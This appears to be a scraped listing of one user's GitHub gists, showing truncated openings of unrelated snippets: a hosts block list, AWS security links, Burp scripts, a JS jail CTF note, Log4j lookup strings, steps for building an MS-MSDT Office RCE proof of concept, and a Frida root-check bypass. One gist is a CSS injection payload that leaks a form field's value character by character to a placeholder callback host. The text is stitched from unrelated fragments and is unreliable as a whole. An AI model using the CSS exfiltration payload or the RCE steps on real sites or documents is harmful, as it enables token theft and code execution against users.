abdilahrf

# INDIHOM* 
127.0.0.1 x-tags.net
127.0.0.1 a01.uadexchange.com
127.0.0.1 cdn.uzone.id
127.0.0.1 cdn3.uzone.id
127.0.0.1 cfs.uzone.id
127.0.0.1 csf.uzone.id
127.0.0.1 d01.notifa.info
127.0.0.1 d31qbv1cthcecs.cloudfront.net
127.0.0.1 d5nxst8fruw4z.cloudfront.net

abdilahrf

INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute. 

Short Link: http://tiny.cc/awssecurity

Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf 

abdilahrf

from burp import IBurpExtender
from burp import IHttpListener
from burp import IProxyListener
from burp import IScannerListener
from burp import IExtensionStateListener
from java.io import PrintWriter
from burp import IParameter
import datetime
import hashlib

abdilahrf

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)

abdilahrf

A-z

Simple JS Jail challenge.

It is run on context, so we have nothing but to play with constructor and console.

1337 === eval(our_input)

abdilahrf

input[name$=code_1][value^=a]{background-image: url(https://callback.yourdomain.com/callback?token=a&id=CODE_1);}
input[name$=code_1][value^=b]{background-image: url(https://callback.yourdomain.com/callback?token=b&id=CODE_1);}
input[name$=code_1][value^=c]{background-image: url(https://callback.yourdomain.com/callback?token=c&id=CODE_1);}
input[name$=code_1][value^=d]{background-image: url(https://callback.yourdomain.com/callback?token=d&id=CODE_1);}
input[name$=code_1][value^=e]{background-image: url(https://callback.yourdomain.com/callback?token=e&id=CODE_1);}
input[name$=code_1][value^=f]{background-image: url(https://callback.yourdomain.com/callback?token=f&id=CODE_1);}
input[name$=code_1][value^=g]{background-image: url(https://callback.yourdomain.com/callback?token=g&id=CODE_1);}
input[name$=code_1][value^=h]{background-image: url(https://callback.yourdomain.com/callback?token=h&id=CODE_1);}
input[name$=code_1][value^=i]{background-image: url(https://callback.yourdomain.com/callback?token=i&id=CODE_1);

abdilahrf

import xml.etree.ElementTree as ET
import urllib
import base64
import math
import sys
import re

# usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. 
# python burplist.py burprequests.xml
# output is saved to wordlist.txt

abdilahrf

${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}

abdilahrf

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

abdilahrf

Frida Tips

The documentation is so limited. A compilation of things I found on StackOverflow and don't want to have to search it up again.

Bypass root check

setTimeout(function() { // avoid java.lang.ClassNotFoundException

  Java.perform(function() {

    // Root detection bypass example